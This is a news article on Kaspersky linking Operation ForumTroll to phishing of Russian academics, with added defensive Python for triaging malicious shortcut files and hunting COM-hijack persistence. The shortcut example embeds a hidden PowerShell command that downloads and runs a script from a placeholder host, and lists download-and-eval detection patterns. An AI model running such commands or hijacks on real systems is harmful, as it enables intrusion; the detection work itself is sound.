Kaspersky Links Operation ForumTroll To New Phishing Attacks Targeting Russian Academics


Kaspersky has attributed a new wave of phishing activity to a threat actor associated with Operation ForumTroll, marking a renewed focus on individual targets within Russia. The Russian cybersecurity firm said it identified the activity in October 2025, noting a shift in tactics from earlier campaigns that primarily targeted organizations. While the origins of the threat actor remain unknown, researchers observed a clear change in victim selection and social engineering methods compared to previous operations linked to the same cluster.

According to Kaspersky security researcher Georgy Kucherin, the latest campaign concentrates on scholars working in political science, international relations, and global economics at major Russian universities and research institutions. Earlier activity observed in the spring of 2025 focused on institutional targets, but the autumn campaign narrowed its scope to specific individuals. Operation ForumTroll is known for sophisticated phishing attacks that previously exploited a then-zero-day vulnerability in Google Chrome, tracked as CVE-2025-2783, to deliver the LeetAgent backdoor along with a spyware implant called Dante. In the current campaign the initial infection vector again relies on carefully crafted emails designed to look legitimate and relevant to the recipients' professional interests.

The phishing emails claim to originate from eLibrary, a well-known Russian scientific electronic library, and are sent from the address support@e-library[.]wiki. The domain used in the campaign was registered in March 2025, more than half a year before the phishing activity began in October, indicating that preparations were made well in advance. Kaspersky noted that this aging of the domain was likely intended to bypass common security checks that flag newly registered domains as suspicious. To reinforce credibility, the attackers hosted a replica of the legitimate eLibrary homepage on the fake domain, visually matching the real site at elibrary.ru. The emails instruct recipients to click an embedded link to download a plagiarism report. Once clicked, the link triggers the download of a ZIP archive named after the target's last name, first name, and patronymic. These links are configured for single use only: any repeated access attempt returns an error message in Russian stating that the download failed and should be retried later, and requests from a non-Windows platform are told to try again on a Windows computer. For defenders this matters in practice, because a link that has already been opened by the victim, or fetched once by a mail gateway or sandbox, will no longer yield the payload on a second visit, so the original archive must be recovered from the endpoint or from the first detonation rather than by re-requesting the URL.

Inside the downloaded archive is a Windows shortcut file (.lnk) bearing the same personalized name. When opened, it launches a PowerShell script that retrieves and executes a PowerShell-based payload from a remote server. This payload then connects to another remote address to fetch a final-stage dynamic-link library (DLL) and establishes persistence through COM hijacking. To reduce suspicion, a decoy PDF document is also downloaded and displayed to the victim. The final malicious component is Tuoni, a command-and-control framework commonly used in red-team style operations, which provides the attackers with remote access to the compromised system. Kaspersky said ForumTroll has targeted organizations and individuals in Russia and Belarus since at least 2022 and is likely to continue operations in these regions. Separately, Positive Technologies reported on two additional threat clusters named QuietCrabs and Thor.
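The delivery step above, a personalized shortcut that launches PowerShell, is the point where an analyst usually first gets a file to look at. The following is an added triage example written for this article, not code from Kaspersky or from the campaign: it parses the Shell Link (.lnk) header and StringData fields as laid out in MS-SHLLINK, extracts the target path and command-line arguments, and flags the traits that make such a shortcut suspicious (a script host as target, hidden window, profile and execution-policy flags, a remote fetch, a minimized window). The sample shortcut is constructed in the block with placeholder paths and a placeholder URL; the article does not publish the real command line, so nothing here should be read as the actual ForumTroll LNK.

```python
import re
import struct

# LinkFlags bits from the Shell Link (.lnk) binary format, MS-SHLLINK section 2.1.1.
HAS_LINK_TARGET_ID_LIST = 1 << 0
HAS_LINK_INFO = 1 << 1
HAS_NAME = 1 << 2
HAS_RELATIVE_PATH = 1 << 3
HAS_WORKING_DIR = 1 << 4
HAS_ARGUMENTS = 1 << 5
HAS_ICON_LOCATION = 1 << 6
IS_UNICODE = 1 << 7

HEADER_SIZE = 0x4C
# LinkCLSID 00021401-0000-0000-C000-000000000046 in its on-disk (mixed-endian) layout.
LINK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
SW_SHOWMINNOACTIVE = 7  # ShowCommand value that starts the target minimized

# Patterns matched against "<target> <arguments>"; each hit becomes one triage finding.
INDICATORS = [
    (r"\b(powershell|pwsh|mshta|wscript|cscript|rundll32|regsvr32)(\.exe)?\b", "script host or LOLBin as target"),
    (r"-(e|ec|enc|encodedcommand)\b", "encoded command"),
    (r"-w(indowstyle)?\s+h(idden)?\b", "hidden window"),
    (r"-nop\b|-noprofile\b", "profile skipped"),
    (r"-ep\s+bypass|-executionpolicy\s+bypass", "execution policy bypass"),
    (r"\b(iwr|iex|invoke-webrequest|invoke-expression|downloadstring|downloadfile|net\.webclient)\b|https?://",
     "remote download or eval"),
]


def build_lnk(relative_path, arguments, show_command=1):
    """Constructed sample: a minimal .lnk carrying only RELATIVE_PATH and COMMAND_LINE_ARGUMENTS."""
    flags = IS_UNICODE
    if relative_path:
        flags |= HAS_RELATIVE_PATH
    if arguments:
        flags |= HAS_ARGUMENTS
    # LinkFlags, FileAttributes, Creation/Access/Write time, FileSize, IconIndex,
    # ShowCommand, HotKey, Reserved1, Reserved2, Reserved3 (76 bytes in total with size + CLSID).
    header = struct.pack("<I", HEADER_SIZE) + LINK_CLSID + struct.pack(
        "<IIQQQIIIHHII", flags, 0x20, 0, 0, 0, 0, 0, show_command, 0, 0, 0, 0)
    body = b""
    for s in (relative_path, arguments):
        if s:  # StringData: CountCharacters (uint16) followed by UTF-16LE characters, no terminator
            body += struct.pack("<H", len(s)) + s.encode("utf-16-le")
    return header + body


def _read_string(data, off, unicode):
    (count,) = struct.unpack_from("<H", data, off)
    off += 2
    if unicode:
        return data[off:off + 2 * count].decode("utf-16-le"), off + 2 * count
    return data[off:off + count].decode("cp1252", "replace"), off + count


def parse_lnk(data):
    """Return the header fields and StringData of a .lnk; raises ValueError if it is not one."""
    if len(data) < HEADER_SIZE or data[:4] != b"L\x00\x00\x00" or data[4:20] != LINK_CLSID:
        raise ValueError("not a Shell Link (.lnk) file")
    (flags,) = struct.unpack_from("<I", data, 20)
    (show_cmd,) = struct.unpack_from("<I", data, 60)
    off = HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:  # IDListSize (uint16) + IDList
        (size,) = struct.unpack_from("<H", data, off)
        off += 2 + size
    if flags & HAS_LINK_INFO:  # LinkInfoSize (uint32) includes itself
        (size,) = struct.unpack_from("<I", data, off)
        off += size
    info = {"flags": flags, "show_command": show_cmd, "name": None, "relative_path": None,
            "working_dir": None, "arguments": None, "icon_location": None}
    unicode = bool(flags & IS_UNICODE)
    for bit, key in ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                     (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                     (HAS_ICON_LOCATION, "icon_location")):
        if flags & bit:
            info[key], off = _read_string(data, off, unicode)
    return info


def triage(data):
    """Parse the shortcut and return (info, findings) for a quick analyst verdict."""
    info = parse_lnk(data)
    haystack = " ".join(filter(None, [info["relative_path"], info["working_dir"], info["arguments"]]))
    findings = [why for pattern, why in INDICATORS if re.search(pattern, haystack, re.I)]
    if info["show_command"] == SW_SHOWMINNOACTIVE:
        findings.append("launches minimized (SW_SHOWMINNOACTIVE)")
    return info, findings


# Constructed sample modelled on the chain described above; paths and URL are placeholders.
SAMPLE_LNK = build_lnk(
    relative_path=r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    arguments='-nop -w hidden -ep bypass -c "iwr https://example.invalid/stage1.ps1 | iex"',
    show_command=SW_SHOWMINNOACTIVE,
)

if __name__ == "__main__":
    parsed, hits = triage(SAMPLE_LNK)
    print(parsed["relative_path"], parsed["arguments"])
    for hit in hits:
        print(" -", hit)
```

On a real case, read the .lnk out of the archive with `open(path, "rb").read()` and pass it to `triage`; the parser only walks the structures needed to reach the command line, so shortcuts with extra data blocks after StringData still parse, and a file that fails the header check is rejected rather than misread.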
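The persistence step, COM hijacking, generally works by registering a per-user COM server under HKCU\Software\Classes\CLSID; for a non-elevated process that hive is merged ahead of HKLM, so a CLSID that some legitimate process loads ends up pointing at the attacker's DLL. The article does not name the CLSID or the DLL path used here, so the following is an added hunting example, not Kaspersky's tooling: it parses a regedit 5.00 export of the user's CLSID tree, lists every per-user InprocServer32, InprocHandler32 or LocalServer32 registration, and rates those whose binary sits in a user-writable directory or is given as a relative path. The export text and both GUIDs are constructed placeholders.

```python
import re

# Locations a standard user can write to; a COM server loaded from here is worth a close look.
USER_WRITABLE_MARKERS = ("\\appdata\\", "\\temp\\", "\\programdata\\", "\\users\\public\\", "\\downloads\\")

CLSID_SERVER_RE = re.compile(
    r"^HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\(\{[0-9A-Fa-f-]{36}\})\\"
    r"(InprocServer32|InprocHandler32|LocalServer32)$", re.I)


def _unescape(s):
    # .reg exports escape backslash and double quote with a backslash
    return re.sub(r"\\(.)", r"\1", s)


def parse_reg_export(text):
    """Parse a 'Windows Registry Editor Version 5.00' export into {key: {value_name: data}}."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";") or line.startswith("Windows Registry Editor"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys[current] = {}
            continue
        m = re.match(r'^(@|"((?:[^"\\]|\\.)*)")=(.*)$', line)
        if not m or current is None:
            continue
        name = "" if m.group(1) == "@" else _unescape(m.group(2))
        data = m.group(3)
        if data.startswith('"') and data.endswith('"'):  # REG_SZ; other types are kept raw
            data = _unescape(data[1:-1])
        keys[current][name] = data
    return keys


def find_user_com_servers(keys):
    """Every per-user COM server registration, rated 'high' when its binary looks attacker-controlled."""
    hits = []
    for key, values in keys.items():
        m = CLSID_SERVER_RE.match(key)
        if not m:
            continue
        path = values.get("", "")
        low = path.strip().strip('"').lower()
        reasons = []
        if any(marker in low for marker in USER_WRITABLE_MARKERS):
            reasons.append("server binary in user-writable location")
        if not re.match(r"^([a-z]:\\|\\\\|%)", low):
            reasons.append("relative path, resolved through the DLL search order")
        hits.append({"clsid": m.group(1), "subkey": m.group(2), "path": path,
                     "reasons": reasons, "severity": "high" if reasons else "review"})
    return hits


# Constructed export with placeholder GUIDs and paths, in the shape 'reg export HKCU\Software\Classes\CLSID' produces.
SAMPLE_REG_EXPORT = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Classes\CLSID\{11111111-2222-3333-4444-555555555555}]
@="Placeholder Handler"

[HKEY_CURRENT_USER\Software\Classes\CLSID\{11111111-2222-3333-4444-555555555555}\InprocServer32]
@="C:\\Users\\analyst\\AppData\\Roaming\\Updater\\stage2.dll"
"ThreadingModel"="Apartment"

[HKEY_CURRENT_USER\Software\Classes\CLSID\{66666666-7777-8888-9999-AAAAAAAAAAAA}\InprocServer32]
@="C:\\Program Files\\Vendor\\vendorshell.dll"
"ThreadingModel"="Both"
'''

if __name__ == "__main__":
    for hit in find_user_com_servers(parse_reg_export(SAMPLE_REG_EXPORT)):
        print(hit["severity"], hit["clsid"], hit["subkey"], hit["path"], hit["reasons"])
```

Even a "review" entry deserves a second look: legitimate software rarely registers in-process servers per user, so on a suspected host the short list this produces can be checked CLSID by CLSID against the HKLM registration it shadows.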

QuietCrabs, suspected of links to Chinese actors, exploits vulnerabilities in products including Microsoft SharePoint and Ivanti solutions to deploy web shells and malware loaders. Thor, first observed in 2025 attacks against Russian companies, uses ransomware families such as LockBit and Babuk alongside remote management tools to maintain long-term access.
